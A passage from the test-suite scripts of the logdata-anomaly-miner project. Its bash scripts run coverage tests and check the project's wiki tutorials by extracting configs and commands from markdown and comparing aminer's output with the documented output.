jhall/192.168.230.165:46011 [jhall] Inactivity timeout (--ping-restart), restarting" >> $LOGFILE echo "2022-01-21 08:09:33 jhall/192.168.230.165:46011 SIGUSR1[soft,ping-restart] received, client-instance restarting" >> $LOGFILE echo "2022-01-23 14:54:54 jhall/192.168.230.165:59814 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)" >> $LOGFILE echo "2022-01-23 14:54:54 jhall/192.168.230.165:59814 TLS Error: TLS handshake failed" >> $LOGFILE echo "2022-01-23 14:54:54 jhall/192.168.230.165:59814 TLS: move_session: dest=TM_LAME_DUCK src=TM_ACTIVE reinit_src=1" >> $LOGFILE ;; *) echo "Unknown parser config '$BN' was found! Please extend these tests. Failing.." exit_code=2 continue ;; esac cat >> $CONFIG_PATH < $OUT 2>&1 exit_code=$? if [[ `grep -ic "VerboseUnparsedAtomHandler" $OUT` != 0 && $BN != "AminerParsingModel" ]] || [[ `grep -o '\bVerboseUnparsedAtomHandler\b' $OUT | wc -l` > 5 ]] || `grep -Fq "Traceback" $OUT` || `grep -Fq "{'Parser'" $OUT` || `grep -Fq "FATAL" $OUT` || `grep -Fq "Config-Error" $OUT`; then echo "Failed Test in $filename" exit_code=1 cat $OUT echo echo fi done rm $CONFIG_PATH exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runCoverageTests.sh000077500000000000000000000022521500476301700246440ustar00rootroot00000000000000#!/bin/bash source config curl $KAFKA_URL --output kafka.tgz tar xvf kafka.tgz > /dev/null rm kafka.tgz $KAFKA_VERSIONSTRING/bin/zookeeper-server-start.sh $KAFKA_VERSIONSTRING/config/zookeeper.properties > /dev/null & sleep 1 $KAFKA_VERSIONSTRING/bin/kafka-server-start.sh $KAFKA_VERSIONSTRING/config/server.properties > /dev/null & sudo coverage run --source=./aminer -m unittest discover -s unit -p '*Test.py' > /dev/null exit_code1=$? touch /tmp/report echo 'Statement Coverage:' > /tmp/report sudo coverage report >> /tmp/report sudo coverage run --source=./aminer --branch -m unittest discover -s unit -p '*Test.py' > /dev/null exit_code2=$? echo 'Branch Coverage:' >> /tmp/report sudo coverage report >> /tmp/report cat /tmp/report rm /tmp/report test -e /var/mail/mail && sudo rm -f /var/mail/mail sudo rm /tmp/test4unixSocket.sock sudo rm /tmp/test5unixSocket.sock sudo rm /tmp/test6unixSocket.sock $KAFKA_VERSIONSTRING/bin/kafka-server-stop.sh > /dev/null $KAFKA_VERSIONSTRING/bin/zookeeper-server-stop.sh > /dev/null sudo rm -r $KAFKA_VERSIONSTRING/ sudo rm -r /tmp/zookeeper sudo rm -r /tmp/kafka-logs if [[ "$exit_code1" -ne 0 || "$exit_code2" -ne 0 ]]; then exit 1 fi exit 0 logdata-anomaly-miner-2.8.0/aecid-testsuite/runElasticSearchWikiTest.sh000077500000000000000000000050401500476301700262620ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Write second line of 3rd to 4th ``` into LOG. # 2.) Write the config to CFG_PATH from 1st ```yaml to 5th ```. # 3.) Replace LogResourceList path with LOG in CFG_PATH and the report interval of the ParserCount. # 4.) Extract the CMD between 10th and 11th ``` # 5.) Compare the results with the outputs between between 12th and 13th ```. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT=logdata-anomaly-miner.wiki/Importing-logs-via-ElasticSearch-interface.md OUT=/tmp/out.txt LOG=/tmp/access.log CFG_PATH=/etc/aminer/config.yml TMPFILE1=/tmp/tmpfile1 TMPFILE2=/tmp/tmpfile2 # extract the file from the development branch of the wiki project. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. exit_code=0 # write log data into file (1.) awk '/^```$/ && ++n == 3, /^```$/ && n++ == 4' < $INPUT | sed '/^```/ d' > $LOG sed -i '1d' $LOG # write the config to CFG_PATH (2.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # replace LogResourceList (3.) sed "s?unix:///var/lib/aelastic/aminer.sock?file:///${LOG}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null sed "s?report_interval: 5?report_interval: 555555555?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # extract CMD (4.) awk '/^```$/ && ++n == 10, /^```$/ && n++ == 11' < $INPUT | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='$' read -ra ADDR <<< "$CMD" CMD="${ADDR[1]}" runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" OUTPUT=$(cat $OUT) # compare results (5.) IN=$(awk '/^```$/ && ++n == 12, /^```$/ && n++ == 13' < $INPUT | sed '/^```/ d') i=0 while IFS= read -r line do if [[ $i -ne 52 && $i -ne 54 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ne 52 && $i -ne 54 ]]; then echo "$line" >> $TMPFILE2 fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then cat $TMPFILE1 echo echo "Failed Test in 5." echo cat $TMPFILE2 fi exit_code=$((exit_code | res)) rm $TMPFILE1 rm $TMPFILE2 rm $OUT rm $LOG sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runFlake8.sh000077500000000000000000000001721500476301700231770ustar00rootroot00000000000000#!/bin/bash python3 -m flake8 /usr/lib/logdata-anomaly-miner --config /home/aminer/logdata-anomaly-miner/.flake8 exit $? logdata-anomaly-miner-2.8.0/aecid-testsuite/runGettingStarted.sh000077500000000000000000000165171500476301700250270ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Read the first log line between the 4th and 5th ``` in the third line and save it to /var/log/apache2/access.log # 2.) Link the ApacheAccessLog by running the command between the 5th ```bash and 7th ``` after "$ ". # 3.) Extract the first aminer command and the CFG_PATH between 9th and 10th ```. # 4.) Write the config to CFG_PATH from 1st ```yaml to 8th ```. # 5.) Extract the resulting outputs between 9th and 10th ``` by comparing following lines with the ones from the output: # - 6,34 with 2,30 # - 37,39 with 37,39 # 6.) Compare the outputs between 9th and 10th ``` and the outputs between 19th and 20th ```. # 7.) Write the config to CFG_PATH from 2nd ```yaml to 11th ```. # 8.) Read 1st ```python to 14th ``` and compare the ApacheAccessModel with the ApacheAccessModel in source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py # 9.) Write new lines to the access.log from the 4th and 5th line between 21st and 22nd ```. # 10.) Read the new command without clearing the persisted data from the 2nd line between 23rd and 24th ```. Run the command and compare the lines 4,32 with the output lines 2,30. # 11.) Read all log lines between the 27th and 28th ``` and save it to /var/log/apache2/access.log # 12.) Extract the resulting outputs and CFG_PATH (1st line) between 30th and 31st ``` by comparing following lines with the ones from the output: # - 4,32 with 2,30 # - 35,37 with 33,35 # - 40,42 with 38,40 # - 45,47 with 43,45 # - 50,52 with 48,50 # - 55,57 with 53,55 # - 60,62 with 58,60 # 13.) Write the config to CFG_PATH from 5th ```yaml to 29th ```. # 14.) Set LearnMode to False. # 15.) Parse the last CMD between 34th and 35th ```. # 16.) Append the new logline and extract the resulting outputs between 40th and 41st ``` by comparing following lines with the ones from the output: # - 4,6 with 2,4 ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/Getting-started-\(tutorial\).md OUT=/tmp/out.txt OUT2=/tmp/out2.txt LOG=/tmp/access.log # extract the file from the development branch of the wiki project. # the first ```yaml script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. sed -i "s?/var/log/apache2/access.log?/tmp/access.log?g" $INPUT_FILE # create log file (1.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE > $LOG sed -i -n '3p' $LOG # link the ApacheAccessModel (2.) awk '/^```bash$/ && ++n == 5, /^```$/' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } $CMD 2> /dev/null # load the aminer command. (3.) awk '/^```$/ && ++n == 9, /^```$/ && n++ == 10' < $INPUT_FILE > $OUT CMD=$(sed -n '4p' < $OUT) CMD=${CMD#*$ } CFG_PATH=/${CMD#*/} # write the yaml config. (4.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # extract resulting outputs and compare them. (5.) OUT1=$(sed -n '6,34p' < $OUT) OUT2=$(sed -n '37,39p' < $OUT) runAminerUntilEnd "$CMD -C" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,30p' < $OUT) IN2=$(sed -n '33,37p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 5." exit_code=$((exit_code | $?)) compareStrings "$OUT2" "$IN2" "Failed Test in 5." exit_code=$((exit_code | $?)) # compare the outputs (6.) awk '/^```$/ && ++n == 9, /^```$/ && n++ == 10' < $INPUT_FILE > $OUT OUT1=$(sed -n '5,$p' < $OUT) awk '/^```$/ && ++n == 19, /^```$/ && n++ == 20' < $INPUT_FILE > $OUT OUT2=$(sed -n '2,$p' < $OUT) compareStrings "$OUT1" "$OUT2" "Failed Test in 6." exit_code=$((exit_code | $?)) # write the second yaml config (7.) awk '/^```yaml$/ && ++n == 2, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # compare ApacheAccessModel (8.) awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(cat $OUT) IN1=$(cat ../source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py) compareStrings "$OUT1" "$IN1" "Failed Test in 8." exit_code=$((exit_code | $?)) # write new loglines. (9.) awk '/^```$/ && ++n == 21, /^```$/ && n++ == 22' < $INPUT_FILE > $LOG OUT1=$(sed -n '4,5p' < $LOG) echo "$OUT1" > $LOG # read new command (10.) awk '/^```$/ && ++n == 23, /^```$/ && n++ == 24' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } OUT1=$(sed -n '4,6p' < $OUT) runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,4p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 10." exit_code=$((exit_code | $?)) # rewrite access.log (11.) awk '/^```$/ && ++n == 27, /^```$/ && n++ == 28' < $INPUT_FILE | sed '/^```/ d' > $LOG # extract resulting outputs and CFG_PATH and compare them. (12.) awk '/^```$/ && ++n == 30, /^```$/ && n++ == 31' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } CFG_PATH=/${CMD#*/} OUT1=$(sed -n '4,32p' < $OUT) OUT2=$(sed -n '35,37p' < $OUT) OUT3=$(sed -n '40,42p' < $OUT) OUT4=$(sed -n '45,47p' < $OUT) OUT5=$(sed -n '50,52p' < $OUT) OUT6=$(sed -n '55,57p' < $OUT) OUT7=$(sed -n '60,62p' < $OUT) # test the fifth yaml config. (13.) awk '/^```yaml$/ && ++n == 5, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,30p' < $OUT) IN2=$(sed -n '33,35p' < $OUT) IN3=$(sed -n '38,40p' < $OUT) IN4=$(sed -n '43,45p' < $OUT) IN5=$(sed -n '48,50p' < $OUT) IN6=$(sed -n '53,55p' < $OUT) IN7=$(sed -n '58,60p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT2" "$IN2" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT3" "$IN3" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT4" "$IN4" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT5" "$IN5" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT6" "$IN6" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT7" "$IN7" "Failed Test in 13." exit_code=$((exit_code | $?)) # set LearnModel to False. (14.) sudo sed -i 's/LearnMode: True/LearnMode: False/g' $CFG_PATH # read new command (15.) awk '/^```$/ && ++n == 34, /^```$/ && n++ == 35' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } # extract logline and resulting outputs and compare them. (16.) awk '/^```$/ && ++n == 40, /^```$/ && n++ == 41' < $INPUT_FILE > $OUT OUT1=$(sed -n '6p' < $OUT) OUT1=$(echo "$OUT1" | sed "s/b'//g") OUT1=$(echo "$OUT1" | sed "s/'//g") echo "$OUT1" >> $LOG OUT1=$(sed -n '4,6p' < $OUT) runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,4p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 16." exit_code=$((exit_code | $?)) sudo rm -r logdata-anomaly-miner.wiki rm $OUT sudo rm $CFG_PATH exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runHowToCreateYourOwnFrequencyDetector.sh000077500000000000000000000256211500476301700311760ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Read the log lines between the 1st and 2nd ``` and save it to /tmp/access.log (LOG) # 2.) Read 1st ```python and 3rd ``` and write the FrequencyDetector to ../source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/FrequencyDetector.py # 3.) Check if the parameter definitions between 4th and 5th are the same as in ../source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py # (each line on its own) # 4.) Add the FrequencyDetector parameters between 6th and 7th are the same as in ../source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py # 5.) Add the code between 2nd ```python and 8th ``` to the ../source/root/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py # 6.) Write the config to CFG_PATH from 1st ```yaml to 9th ``` and replace LogResourceList to LOG. # 7.) Read CMD from the second line between the 1st ```bash to 10th ``` and run it with sudo. # 8.) Compare the outputs with the ones between 11th and 12th ```. # 9.) Read line between 3rd ```python and 13th ``` and add it between 23rd and 24th line in the CFG_PATH # 10.) Remove lines 36-38 in the $FREQ_DET and append the method between 4th ```python and 14th ``` + newline between. # 11.) Run CMD and check if the output is the same as the one between 15th and 16th ```. # 12.) Remove the previously added lines and add the lines between 5th ```python and 17th ```. # 13.) Run CMD and compare the output to the one between 18th and 19th ```. # 14.) Remove the previously added lines and add the lines between 6th ```python and 20th ```. # 15.) Run CMD and compare the output to the one between 21st and 22nd ```. # 16.) Remove the previously added lines and add the lines between 7th ```python and 23rd ```. # 17.) Run CMD and compare the output to the one between 1st ```json and 24th ```. # 18.) Replace the do_persist method with the lines between 8th ```python and 25th ``` and run CMD. # 19.) Run CMD in 2nd ```bash and 26th ``` and compare it to the output in the second line. # 20.) Add lines between 9th ```python and 27th ```. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi sudo chown -R aminer:aminer /var/lib/aminer 2> /dev/null INPUT=logdata-anomaly-miner.wiki/HowTo-Create-your-own-FrequencyDetector.md VAL_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py TMP_VAL_SCHEMA=/tmp/AnalysisValidationSchema.py NOR_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py OUT=/tmp/out.txt SRC_FILE=logdata-anomaly-miner.wiki/HowTo-Create-your-own-FrequencyDetector.md VAL_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py TMP_VAL_SCHEMA=/tmp/AnalysisValidationSchema.py YML_CONFIG=/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py TMP_YML_CONFIG=/tmp/YamlConfig.py TMP_SCHEMA=/tmp/schema.py FREQ_DET=/usr/lib/logdata-anomaly-miner/aminer/analysis/FrequencyDetector.py TMP_FREQ_DET=/tmp/FrequencyDetector.py CFG_PATH=/etc/aminer/config.yml LOG=/tmp/access.log # extract the file from the development branch of the wiki project. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. # create log file (1.) awk '/^```$/ && ++n == 1, /^```$/ && n++ == 2' < $INPUT | sed '/^```/ d' > $LOG # 2.) create FrequencyDetector awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 3.) compare parameter definitions with AnalysisNormalisationSchema awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT > $OUT LINE=$(sed -n '2p' < $OUT) if ! fgrep -q "$LINE" $NOR_SCHEMA; then echo "$LINE not found in $NOR_SCHEMA" echo "Failed Test in 3." echo exit_code=1 fi LINE=$(sed -n '3p' < $OUT) if ! fgrep -q "$LINE" $NOR_SCHEMA; then echo "$LINE not found in $NOR_SCHEMA" echo "Failed Test in 3." echo exit_code=1 fi # 4.) Add the FrequencyDetector parameters to the AnalysisValidationSchema sudo cp $VAL_SCHEMA $TMP_VAL_SCHEMA awk '/^{$/,/^ }$/' $VAL_SCHEMA > $TMP_SCHEMA echo , >> $TMP_SCHEMA awk '/^```$/ && ++n == 6, /^```$/ && n++ == 7' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA awk '/^ ]$/,/^}$/' $VAL_SCHEMA >> $TMP_SCHEMA sudo cp $TMP_SCHEMA $VAL_SCHEMA # 5.) Add code to the YamlConfig.py # create backup of YamlConfig.py cp $YML_CONFIG $TMP_YML_CONFIG # add code to YamlConfig.py printf " " > $TMP_SCHEMA awk '/^```python$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA sudo sed -i " /anomaly_threshold=item/r $TMP_SCHEMA" $YML_CONFIG # 6.) Write the config to CFG_PATH and replace LogResourceList to LOG. awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null sudo sed -i 's?file:///home/ubuntu/apache.log?file:///tmp/access.log?g' $CFG_PATH # 7.) Read CMD from the second line between the 1st ```bash to 10th ``` and run it with sudo. awk '/^```bash$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '2p' < $OUT) CMD="sudo ${CMD#* } --config $CFG_PATH" runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$? # 8.) Compare the outputs with the ones between 11th and 12th ```. OUT1=$(tail -n 14 $OUT) awk '/^```$/ && ++n == 11, /^```$/ && n++ == 12' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 8." exit_code=$((exit_code | $?)) # 9.) Read line between 3rd ```python and 13th ``` and add it between 23rd and 24th line in the FREQ_DET awk '/^```python$/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` sed -i "23 i \ $IN1" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 10.) Remove lines 36-38 in the FREQ_DET and append the method between 4th ```python and 14th ``` + newline between. sed -i -e "35,38d" $TMP_FREQ_DET awk '/^```python$/ && ++n == 4, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 11.) Run CMD and check if the output is the same as the one between 15th and 16th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 18 $OUT) awk '/^```$/ && ++n == 15, /^```$/ && n++ == 16' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 11." exit_code=$((exit_code | $?)) # 12.) Remove the previously added lines and add the lines between 5th ```python and 17th ```. tac $TMP_FREQ_DET | sed '1,13d' | tac > $OUT cp $OUT $TMP_FREQ_DET awk '/^```python$/ && ++n == 5, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "$IN1" >> $TMP_FREQ_DET # 13.) Run CMD and compare the output to the one between 18th and 19th ```. sed -i "23 i \ self.counts = {}" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 14 $OUT) awk '/^```$/ && ++n == 18, /^```$/ && n++ == 19' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 13." exit_code=$((exit_code | $?)) # 14.) Remove the previously added lines and add the lines between 6th ```python and 20th ```. tail -n 6 $TMP_FREQ_DET > $OUT IN=`cat $OUT` tac $TMP_FREQ_DET | sed '1,14d' | tac > $OUT cp $OUT $TMP_FREQ_DET awk '/^```python$/ && ++n == 6, /^```$/' < $INPUT | sed '/^```/ d' | sed '1,2d;23d' > $OUT IN1=`cat $OUT` echo -e "$IN1" >> $TMP_FREQ_DET echo -e "$IN" >> $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 15.) Run CMD and compare the output to the one between 21st and 22nd ```. sed -i "23 i \ self.counts_prev = {}" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 17 $OUT) awk '/^```$/ && ++n == 21, /^```$/ && n++ == 22' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 15." exit_code=$((exit_code | $?)) # 16.) Remove the previously added lines and add the lines between 7th ```python and 23rd ```. tail -n 6 $TMP_FREQ_DET > $OUT IN=`cat $OUT` tac $TMP_FREQ_DET | sed '1,26d' | tac > $OUT cp $OUT $TMP_FREQ_DET awk '/^```python$/ && ++n == 7, /^```$/' < $INPUT | sed '/^```/ d' | sed '1,2d;38d' > $OUT IN1=`cat $OUT` echo -e "$IN1" >> $TMP_FREQ_DET echo -e "$IN" >> $TMP_FREQ_DET tac $TMP_FREQ_DET | sed '1d' | tac > $OUT # remove print cp $OUT $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 17.) Run CMD and compare the output to the one between 1st ```json and 24th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # delete detectionTimestamp from comparison tac $OUT | sed '32d' | tac > $TMP_SCHEMA cp $TMP_SCHEMA $OUT OUT1=$(tail -n 60 $OUT) awk '/^```json$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $OUT # delete detectionTimestamp from comparison sed -i -e "30d" $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 17." exit_code=$((exit_code | $?)) # 18.) Replace the do_persist method with the lines between 8th ```python and 25th ``` and run CMD. sed -i -e "56,59d" $TMP_FREQ_DET awk '/^```python$/ && ++n == 8, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n $IN1" >> $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # 19.) Run CMD in 2nd ```bash and 26th ``` and compare it to the output in the second line. awk '/^```bash$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD1=$(sed -n '1p' < $OUT) CMD1="${CMD1#* }" $CMD1 > $OUT OUT1=`cat $OUT` awk '/^```bash$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(sed -n '2p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 19." exit_code=$((exit_code | $?)) # 20.) Add lines between 9th ```python and 27th ```. CMD="sudo aminer -f" awk '/^```python$/ && ++n == 9, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` sed -i "/ PersistenceUtil.add_persistable_component(self)/r $OUT" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) sudo cp $TMP_VAL_SCHEMA $VAL_SCHEMA sudo cp $TMP_YML_CONFIG $YML_CONFIG sudo rm $TMP_VAL_SCHEMA sudo rm $CFG_PATH sudo rm $TMP_YML_CONFIG sudo rm $TMP_FREQ_DET sudo rm $FREQ_DET sudo rm $OUT sudo rm $TMP_SCHEMA sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runHowToCreateYourOwnSequenceDetector.sh000077500000000000000000000402441500476301700310030ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Read the log lines between the 2nd and 3rd ``` and save it to /tmp/access.log (LOG) # 2.) Read 2nd ```bash and 3rd ```, extract CMD from the first line after # , run CMD and compare the output with the 2nd to 4th line of the previous output. # 3.) Read commands between 3rd ```bash and 5th ```, get the CMD after # and check if aminer_install.sh exists and is executable. # 4.) Read the CMD between 4th ```bash and 6th ``` and get the CMD after # . # 5.) Replace the path in the second string with the current directory and run the CMD. # 6.) Read the CMD between 5th ```bash and 7th ```, get the CMD after # and run it. # 7.) Read the CMD between 6th ```bash and 8th ```, get the CMD after # and run it. # 8.) Read between 1st ```yaml and 9th ``` and store it in CFG_PATH. # 9.) Read CFG_PATH, replace the line with json: True and compare it with the 1st ```yaml in Getting-started-(tutorial).md. # 10.) Read 7th ```bash and 10th ```. Extract CMD in first line and run it as sudo. # 11.) Compare the outputs (replace lines with timestamps and dates). # 12.) Read 1st ```python and 12th ``` and write it to SEQ_DET. # 13.) Read 2nd ```yaml and 13th ``` and write it at 18th line in CFG_PATH. # 14.) Check if line between 15th and 16th ``` can be found in /usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py # 15.) Add code between 18th and 19th ``` to /usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py # 16.) Add 2nd ```python and 21st ``` to the YML_CONFIG. # 17.) Run aminer CMD and check if the output contains "Detector template received a log atom!" times the number of log lines. # 18.) Read 3rd ```python and 24th ``` and replace the receive_atom method in the SEQ_DET. # 19.) Run aminer CMD and check if the output contains data between 25th and 26th ```. # 20.) Read 4th ```python and 27th ``` and replace the receive_atom method in the SEQ_DET. # 21.) Run aminer CMD and check if the output is the same as between 28th and 29th ```. # 22.) Read 5th ```python and 30th ``` and replace the receive_atom method in the SEQ_DET. # 23.) Replace Analysis in CFG_PATH with the config between 3rd ```yaml and 31st ```. # 24.) Run aminer CMD and check if the output is the same as between 32nd and 33th ```. # 25.) Add code between 34th and 35th ``` in the __init__ method. # 26.) Read 6th ```python and 36th ``` and replace the receive_atom method in the SEQ_DET. # 27.) Run aminer CMD and check if the output is the same as between 37th and 38th ```. # 28.) Read 7th ```python and 39th ``` and replace the receive_atom method in the SEQ_DET. # 29.) Add lines between 14th ```bash and 42nd ``` to the LOG. # 30.) Run aminer CMD and check if the output is the same as between 40th and 41st ``` plus the text between 43th and 44th ```. # 31.) Read 8th ```python and 45th ``` and replace the receive_atom method in the SEQ_DET. # 32.) Compare the output with the json between 1st ```json and 46th ```. # 33.) Replace the do_persist method with the code between 9th ```python and 47th ```. # 34.) Run the CMD in the first line between 15th ```bash and 48th ``` and compare the output with the second line. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi sudo chown -R aminer:aminer /var/lib/aminer 2> /dev/null INPUT=logdata-anomaly-miner.wiki/HowTo-Create-your-own-SequenceDetector.md SRC_FILE=logdata-anomaly-miner.wiki/HowTo-Create-your-own-SequenceDetector.md VAL_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py TMP_VAL_SCHEMA=/tmp/AnalysisValidationSchema.py 